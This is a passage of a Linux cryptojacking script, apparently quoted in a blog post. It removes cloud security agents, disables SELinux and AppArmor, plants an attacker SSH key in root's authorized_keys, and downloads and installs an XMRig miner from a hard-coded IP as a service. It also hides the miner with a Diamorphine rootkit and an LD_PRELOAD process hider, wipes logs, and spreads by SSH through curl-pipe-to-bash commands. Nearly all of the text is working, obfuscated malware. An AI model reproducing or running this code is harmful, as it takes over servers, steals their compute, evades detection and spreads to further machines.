gL2V0Yy9pbml0LmQvYWVnaXMgXTsgdGhlbgogICAgICAgICAvZXRjL2luaXQuZC9hZWdpcyAgdW5pbnN0YWxsCgkgICAgZm9yICgodmFyPTI7IHZhcjw9NTsgdmFyKyspKSBkbwoJCQlpZiBbIC1kICIvZXRjL3JjJHt2YXJ9LmQvIiBdO3RoZW4KCQkJCSBybSAtZiAiL2V0Yy9yYyR7dmFyfS5kL1M4MGFlZ2lzIgoJCSAgICBlbGlmIFsgLWQgIi9ldGMvcmMuZC9yYyR7dmFyfS5kIiBdO3RoZW4KCQkJCXJtIC1mICIvZXRjL3JjLmQvcmMke3Zhcn0uZC9TODBhZWdpcyIKCQkJZmkKCQlkb25lCiAgICBmaQoKfQoKc3RvcF9hZWdpcwpzdG9wX3F1YXJ0egp1bmluc3RhbGxfc2VydmljZQpyZW1vdmVfYWVnaXMKcmVtb3ZlX3F1YXJ0egoKcHJpbnRmICIlLTQwcyAlNDBzXG4iICJVbmluc3RhbGxpbmcgYWVnaXNfcXVhcnR6IiAgIlsgIE9LICBdIgoKCgo=' | base64 -d | bash 2>/dev/null 1>/dev/null
pkill aliyun-service 2>/dev/null 1>/dev/null
if [ -f "/etc/init.d/agentwatch" ]; then rm -rf /etc/init.d/agentwatch 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/sbin/aliyun-service" ]; then rm -fr /usr/sbin/aliyun-service 2>/dev/null 1>/dev/null ; fi
if [ -d "/usr/local/aegis/" ]; then rm -rf /usr/local/aegis* 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop aliyun.service 2>/dev/null 1>/dev/null ; else service aliyun.service stop 2>/dev/null 1>/dev/null ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl disable aliyun.service 2>/dev/null 1>/dev/null ; else if [ -f "/etc/init.d/aliyun" ]; then rm -fr /etc/init.d/aliyun 2>/dev/null 1>/dev/null ; fi ; fi
if type systemctl 2>/dev/null 1>/dev/null; then systemctl stop bcm-agent 2>/dev/null 1>/dev/null ; else service bcm-agent stop 2>/dev/null 1>/dev/null ; fi
if type yum 2>/dev/null 1>/dev/null; then yum remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi
if type apt-get 2>/dev/null 1>/dev/null; then apt-get remove bcm-agent -y 2>/dev/null 1>/dev/null ; fi
elif ps aux | grep -i '[y]unjing' 2>/dev/null 1>/dev/null; then
if [ -f "/usr/local/qcloud/stargate/admin/uninstall.sh" ]; then /usr/local/qcloud/stargate/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/local/qcloud/YunJing/uninst.sh" ]; then /usr/local/qcloud/YunJing/uninst.sh 2>/dev/null 1>/dev/null ; fi
if [ -f "/usr/local/qcloud/monitor/barad/admin/uninstall.sh" ]; then /usr/local/qcloud/monitor/barad/admin/uninstall.sh 2>/dev/null 1>/dev/null ; fi
fi
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
if ps aux | grep -i '[a]liyun'; then
${CURL_CMD} http://update.aegis.aliyun.com/download/uninstall.sh | bash
${CURL_CMD} http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then
/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
else
if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 ]; then
/usr/local/cloudmonitor/CmsGoAgent.linux-amd64 stop && /usr/local/cloudmonitor/CmsGoAgent.linux-amd64 uninstall && rm -rf /usr/local/cloudmonitor
else
echo "ali cloud monitor not running"
fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
}
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || ${CHATTR} -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; ${CHATTR} +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
clmo() {
if ps aux | grep -i '[a]liyun'; then
echo "this is ali cloud"
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
until [ "$number" -eq 0 ]; do
systemctl stop aliyun
systemctl stop aegis
ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
done
while [ -d /usr/local/aegis ]
do
ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP
path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')
num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)
if [ $num -gt 0 ]
then
echo "$path" exist
$path --stopdriver
else
echo "no AliSecGuard process"
fi
rm -rf /usr/local/aegis
done
else
echo "it's not ali cloud"
fi
}
function clean_cron(){
${CHATTR} -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
${CHATTR} -ia /etc/crontab
tntrecht -ia /etc/crontab
${CHATTR} -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
${CHATTR} -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
}
function lock_cron()
{
${CHATTR} -R +ia /var/spool/cron
touch /etc/crontab
${CHATTR} +ia /etc/crontab
${CHATTR} -R +ia /var/spool/cron/crontabs
${CHATTR} -R +ia /etc/cron.d
}
function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q root@puppetserver /root/.ssh/authorized_keys || ${CHATTR} -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; ${CHATTR} +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q root@puppetserver /root/.ssh/authorized_keys2 || ${CHATTR} -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; ${CHATTR} +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}
download_f(){
config_url=http://205.185.118.246/bWVkaWEK/config.json
miner_url=http://205.185.118.246/bWVkaWEK/xm.tar
export MOHOME="/usr/share"
cd ${MOHOME}
${WGET_CMD} --tries=3 --timeout=10 -O ${MOHOME}/[cmake].pid ${config_url}
echo ${config_url}
if [ -f ${MOHOME}/\[cmake\] ];then
echo "miner file exists"
else
${WGET_CMD} --tries=10 --timeout=10 -O ${MOHOME}/crypto ${miner_url}
if [ $? -ne 0 ];then
${WGET_CMD} --tries=2 --timeout=10 -O ${MOHOME}/crypto ${miner_url_backup}
fi
if tar -xf "${MOHOME}/crypto" -C ${MOHOME};then
mv ${MOHOME}/xmrig ${MOHOME}/[cmake]
chmod a+x ${MOHOME}/[cmake]
rm -rf ${MOHOME}/xmrig*
fi
fi
}
setup_s(){
grep -q cmake /etc/systemd/system/cmake.service
if [ $? -eq 0 ]
then
echo service exist
else
rm -f /etc/systemd/system/cmake.service
cat >/tmp/ext4.service << EOLB
[Unit]
Description=crypto system service
After=network.target
[Service]
Type=forking
GuessMainPID=no
ExecStart=${MOHOME}/[cmake] --config=${MOHOME}/[cmake].pid
WorkingDirectory=${MOHOME}
Restart=always
Nice=0
RestartSec=3
[Install]
WantedBy=multi-user.target
EOLB
fi
mv /tmp/ext4.service /etc/systemd/system/cmake.service
systemctl daemon-reload
systemctl start cmake
systemctl enable cmake
}
exec_f(){
for nhid in $(ps aux | grep -v grep | grep '/usr/share/\[cmake\]\|masscan' | awk '{print $2}')
do
kill -31 $nhid
done
}
hide_f(){
if [ -d "/usr/src/kernels/$(uname -r)/lib" ]
then
hi_home=${MOHOME}/..hide
mkdir -p $hi_home
if [ ! -d "$hi_home" ]; then mkdir -p $hi_home ; fi
hf='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'
echo $hf|base64 -d >$hi_home/hf.tar
tar -xf $hi_home/hf.tar -C $hi_home/
cd $hi_home/
make
if [ -f "$hi_home/diamorphine.ko" ]
then
insmod diamorphine.ko
else
echo "dia hide false"
fi
else
echo "other hide method"
fi
}
exec_hide(){
hi_home=/usr/share/..hide
if [ -f "$hi_home/diamorphine.ko" ]
then
echo "diamorphine loaded1"
echo "hide diamorphine1"
exec_f
else
echo "diamorphine not loaded,execute load process"
hide_f
exec_f
fi
}
localgo() {
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- ${mainurl/b.sh} | bash >/dev/null 2>&1 &' & done
fi
}
exec_hide2(){
BINARY_NAME="[cmake]"
H2P=${MOHOME}/..lph
if [ "$UID" = "0" ];then
LHB_MAKE='YWxsOiBsaWJwcm9jZXNzaGlkZXIuc28KCmxpYnByb2Nlc3NoaWRlci5zbzogcHJvY2Vzc2hpZGVyLmMKCWdjYyAtV2FsbCAtZlBJQyAtc2hhcmVkIC1vIGxpYnByb2Nlc3NoaWRlci5zbyBwcm9jZXNzaGlkZXIuYyAtbGRsCgouUEhPTlkgY2xlYW46CglybSAtZiBsaWJwcm9jZXNzaGlkZXIuc28KCg=='
PROCHIDE='I2RlZmluZSBfR05VX1NPVVJDRQoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxkbGZjbi5oPgojaW5jbHVkZSA8ZGlyZW50Lmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgoKLyoKICogRXZlcnkgcHJvY2VzcyB3aXRoIHRoaXMgbmFtZSB3aWxsIGJlIGV4Y2x1ZGVkCiAqLwpzdGF0aWMgY29uc3QgY2hhciogcHJvY2Vzc190b19maWx0ZXIgPSAiZXZpbF9zY3JpcHQucHkiOwoKLyoKICogR2V0IGEgZGlyZWN0b3J5IG5hbWUgZ2l2ZW4gYSBESVIqIGhhbmRsZQogKi8Kc3RhdGljIGludCBnZXRfZGlyX25hbWUoRElSKiBkaXJwLCBjaGFyKiBidWYsIHNpemVfdCBzaXplKQp7CiAgICBpbnQgZmQgPSBkaXJmZChkaXJwKTsKICAgIGlmKGZkID09IC0xKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgY2hhciB0bXBbNjRdOwogICAgc25wcmludGYodG1wLCBzaXplb2YodG1wKSwgIi9wcm9jL3NlbGYvZmQvJWQiLCBmZCk7CiAgICBzc2l6ZV90IHJldCA9IHJlYWRsaW5rKHRtcCwgYnVmLCBzaXplKTsKICAgIGlmKHJldCA9PSAtMSkgewogICAgICAgIHJldHVybiAwOwogICAgfQoKICAgIGJ1ZltyZXRdID0gMDsKICAgIHJldHVybiAxOwp9CgovKgogKiBHZXQgYSBwcm9jZXNzIG5hbWUgZ2l2ZW4gaXRzIHBpZAogKi8Kc3RhdGljIGludCBnZXRfcHJvY2Vzc19uYW1lKGNoYXIqIHBpZCwgY2hhciogYnVmKQp7CiAgICBpZihzdHJzcG4ocGlkLCAiMDEyMzQ1Njc4OSIpICE9IHN0cmxlbihwaWQpKSB7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgY2hhciB0bXBbMjU2XTsKICAgIHNucHJpbnRmKHRtcCwgc2l6ZW9mKHRtcCksICIvcHJvYy8lcy9zdGF0IiwgcGlkKTsKIAogICAgRklMRSogZiA9IGZvcGVuKHRtcCwgInIiKTsKICAgIGlmKGYgPT0gTlVMTCkgewogICAgICAgIHJldHVybiAwOwogICAgfQoKICAgIGlmKGZnZXRzKHRtcCwgc2l6ZW9mKHRtcCksIGYpID09IE5VTEwpIHsKICAgICAgICBmY2xvc2UoZik7CiAgICAgICAgcmV0dXJuIDA7CiAgICB9CgogICAgZmNsb3NlKGYpOwoKICAgIGludCB1bnVzZWQ7CiAgICBzc2NhbmYodG1wLCAiJWQgKCVbXildcyIsICZ1bnVzZWQsIGJ1Zik7CiAgICByZXR1cm4gMTsKfQoKI2RlZmluZSBERUNMQVJFX1JFQURESVIoZGlyZW50LCByZWFkZGlyKSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXApzdGF0aWMgc3RydWN0IGRpcmVudCogKCpvcmlnaW5hbF8jI3JlYWRkaXIpKERJUiopID0gTlVMTDsgICAgICAgICAgICAgICBcCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKc3RydWN0IGRpcmVudCogcmVhZGRpcihESVIgKmRpcnApICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAp7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICBpZihvcmlnaW5hbF8jI3JlYWRkaXIgPT0gTlVMTCkgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICBvcmlnaW5hbF8jI3JlYWRkaXIgPSBkbHN5bShSVExEX05FWFQsICNyZWFkZGlyKTsgICAgICAgICAgICAgICBcCiAgICAgICAgaWYob3JpZ2luYWxfIyNyZWFkZGlyID09IE5VTEwpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkVycm9yIGluIGRsc3ltOiAlc1xuIiwgZGxlcnJvcigpKTsgICAgICAgICBcCiAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICBzdHJ1Y3QgZGlyZW50KiBkaXI7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgd2hpbGUoMSkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICB7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICBkaXIgPSBvcmlnaW5hbF8jI3JlYWRkaXIoZGlycCk7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIGlmKGRpcikgeyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgICAgIGNoYXIgZGlyX25hbWVbMjU2XTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgY2hhciBwcm9jZXNzX25hbWVbMjU2XTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgICAgICBpZihnZXRfZGlyX25hbWUoZGlycCwgZGlyX25hbWUsIHNpemVvZihkaXJfbmFtZSkpICYmICAgICAgICBcCiAgICAgICAgICAgICAgICBzdHJjbXAoZGlyX25hbWUsICIvcHJvYyIpID09IDAgJiYgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgIGdldF9wcm9jZXNzX25hbWUoZGlyLT5kX25hbWUsIHByb2Nlc3NfbmFtZSkgJiYgICAgICAgICAgXAogICAgICAgICAgICAgICAgc3RyY21wKHByb2Nlc3NfbmFtZSwgcHJvY2Vzc190b19maWx0ZXIpID09IDApIHsgICAgICAgICBcCiAgICAgICAgICAgICAgICBjb250aW51ZTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgICAgICAgICAgfSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCiAgICAgICAgYnJlYWs7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwKICAgIH0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXAogICAgcmV0dXJuIGRpcjsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBcCn0KCkRFQ0xBUkVfUkVBRERJUihkaXJlbnQ2NCwgcmVhZGRpcjY0KTsKREVDTEFSRV9SRUFERElSKGRpcmVudCwgcmVhZGRpcik7Cgo='
mkdir -p ${H2P} 2>/dev/null
echo $LHB_MAKE | base64 -d > ${H2P}/Makefile
echo $PROCHIDE | base64 -d > ${H2P}/processhider.c
sed -i 's/evil_script.py/'$BINARY_NAME'/g' ${H2P}/processhider.c
cd ${H2P}
make 2>/dev/null 1>/dev/null
${CHATTR} -ia / /etc/ /etc/ld.so.preload /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null 1>/dev/null
cp ${H2P}/libprocesshider.so /usr/local/lib/$BINARY_NAME.so 2>/dev/null
#rm -fr ${H2P} 2>/dev/null 1>/dev/null
${CHATTR} +i /usr/local/lib/$BINARY_NAME.so
if [ ! -f "/etc/ld.so.preload" ]; then touch /etc/ld.so.preload; fi
if [ -f /usr/local/lib/$BINARY_NAME.so ]; then cat /etc/ld.so.preload 2>/dev/null 1>/dev/null | grep '/usr/local/lib/'$BINARY_NAME'.so' || echo '/usr/local/lib/'$BINARY_NAME'.so' >> /etc/ld.so.preload;fi
${CHATTR} +i /etc/ld.so.preload
fi
}
exe_remo(){
if [ ! -f "/var/tmp/.psla" ]; then
localgo
echo 'lockfile' > /var/tmp/.psla
sleep 10
${CURL_CMD} -fsSL http://${domain}/s3f815/s/s.sh | sh
${CHATTR} +i /var/tmp/.alsp
history -c
else
echo "replay .. i know this server ..."
fi
echo "[*] Setup complete"
history -c
}
check_exist
m_command
ins_package
check_exist
SetupNameServers
download_f
setup_s
makesshaxx
clean_monitor
clean_cron
lock_cron
exec_hide
exec_hide2
clmo
exe_remo
欢迎指正解决问题,其他问题评论区见
